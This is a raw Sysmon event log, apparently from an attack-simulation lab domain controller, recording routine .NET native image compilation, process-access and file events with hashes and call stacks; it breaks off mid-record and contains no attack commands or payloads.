21:01:17.654{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.654{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.623{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37A60AB4E97412AAC8E10D46F55076CF,SHA256=965038EBEDD0749C0FE877CCD4C20B948F130A5368E71E36F8F7C3C6C02B3FD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.560{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.560{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.498{4DB9351A-A11C-60D3-8302-00000000CF01}6252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\W56GVWCW12\System.Printing.ni.dll.auxMD5=BE8FE718251EAC27EF18D851C78DC7F3,SHA256=656706A64AB7CCBF3D83BB132148CE8C16B25FD3BF900B5A4BC7F0E5CCC00989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.482{4DB9351A-A11C-60D3-8302-00000000CF01}6252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\W56GVWCW12\System.Printing.ni.dllMD5=9EC159AC4980BFE3FACF498EECB48BE4,SHA256=E29D2F08161C92B0C8B6728525B26665B7FA76E1D88BBEE9BAB000A287071BB4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:17.451{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\186c-0\System.Printing.dll2021-06-23 21:01:17.451 23542300x800000000000000018977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.951{4DB9351A-A11E-60D3-8B02-00000000CF01}7156NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68REWFTSHZ\System.Runtime.Serialization.Formatters.Soap.ni.dll.auxMD5=14728FE0E93419D5570911F529CC7DC3,SHA256=DBE1E91C843CEE9832808D1A2FB5DB2FAB6137638AB0F9779774F28098153F71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.951{4DB9351A-A11E-60D3-8B02-00000000CF01}7156NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68REWFTSHZ\System.Runtime.Serialization.Formatters.Soap.ni.dllMD5=AED35C076E2447686C44DA0B77BED8B9,SHA256=CABF23415564A6C8FC20BF381B7D6722918DFC22E84951F9D10BB0895E340B68,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:18.935{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bf4-0\System.Runtime.Serialization.Formatters.Soap.dll2021-06-23 21:01:18.935 10341000x800000000000000018974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.701{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06B20C8535856BAFFD4E16B85B33D615,SHA256=BC625020BD847E7CB99FE5C7CB5D26884F5B54F24E05167678339675D2AD9C00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.654{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.654{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.607{4DB9351A-A11E-60D3-8902-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R8C4ULFFWB\System.Runtime.DurableInstancing.ni.dll.auxMD5=DEDE93EF02B00C1EC460CE8546A9E1BD,SHA256=919C998D2DE521B98CE32469DF82AD630BDB4AD97E97FF7AA5B7E9909220F8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.592{4DB9351A-A11E-60D3-8902-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R8C4ULFFWB\System.Runtime.DurableInstancing.ni.dllMD5=63B25CAB80B7979234AE6E59094BD551,SHA256=25DED5BC1D407EDDA0564ED913BED34EFD40B592757CCD01BA49837F662D1B00,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:18.576{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15d8-0\System.Runtime.DurableInstancing.dll2021-06-23 21:01:18.576 10341000x800000000000000018964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.310{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.310{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.232{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.232{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.185{4DB9351A-A11D-60D3-8702-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0DSCRF6YH1\System.Runtime.Caching.ni.dll.auxMD5=F796378188C5CE8116835381A819120B,SHA256=C8AE9BBAA0B3A23F6D9456055BB0CE11583CC362E46DD318FBD7247D45BE9C81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.185{4DB9351A-A11D-60D3-8702-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0DSCRF6YH1\System.Runtime.Caching.ni.dllMD5=D02EC327DB634B2F264668E78C834445,SHA256=0FD17BC2A1911A06806803AAD97B65677DF475D0D3A002AC713253FF3ADE7615,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:18.170{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15a8-0\System.Runtime.Caching.dll2021-06-23 21:01:18.170 10341000x800000000000000018955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.951{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F37894A1A84B7B8270DB203E9D801584,SHA256=BF751FDEF59EE44DCB0E4014DF7F4752F7E65CE9FB73787CC06747B6526E4AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC0D3D6704C27B074D9279AA1CA1E90,SHA256=4AEBB3FEACCB4937456FB83AFB8AD60DF3B2E94B9EAF0F1D3462C1DA0CB6D9CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 